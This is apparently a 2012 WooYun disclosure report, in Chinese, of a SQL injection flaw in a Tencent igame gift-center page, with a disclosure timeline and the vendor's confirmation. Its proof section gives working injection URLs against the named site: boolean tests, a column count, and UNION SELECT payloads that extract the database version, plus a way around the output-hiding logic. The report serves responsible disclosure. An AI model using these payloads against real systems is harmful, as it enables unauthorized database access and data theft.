漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-016107
漏洞标题:腾讯游戏人生注入漏洞(附分析及绕过方式)
相关厂商:腾讯
漏洞作者: 路人甲
提交时间:2012-12-17 10:42
修复时间:2013-01-31 10:43
公开时间:2013-01-31 10:43
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-12-17: 细节已通知厂商并且等待厂商处理中
2012-12-17: 厂商已经确认,细节仅向厂商公开
2012-12-27: 细节向核心白帽子及相关领域专家公开
2013-01-06: 细节向普通白帽子公开
2013-01-16: 细节向实习白帽子公开
2013-01-31: 细节向公众公开
简要描述:
腾讯的游戏人生有一处注入漏洞,并未详细测试可获得信息
详细说明:
腾讯的游戏人生有一处注入漏洞,不过不知道能得到什么信息,有高手的话应该可以获取密码等等
漏洞证明:
http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987 and 1=1
正常
http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987 and 1=2
order by 13的时候正常了说明13个字段,继续union,但是发现and 1=1的时候完全正常
http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13
and 1=2的时候失败鸟,为神马捏,初步分析是里面含有隐含的逻辑,注射成功但是由于业务逻辑无法在前台显示,可以这么试试
http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987 and 1=2 union select 987,987,987,987,987,987,987,987,987,987,987,987,987
这下成功了,然后再看看哪个字段是要被逻辑用到的吧
http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987%20and%201=2%20union%20select%201,1,1,987,1,1,version%28%29,987,987,987,987,987,1
这样就可以了嘛,用这个字段显示就可以
修复方案:
通常的防注入
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2012-12-17 14:13
厂商回复:
非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。
最新状态:
暂无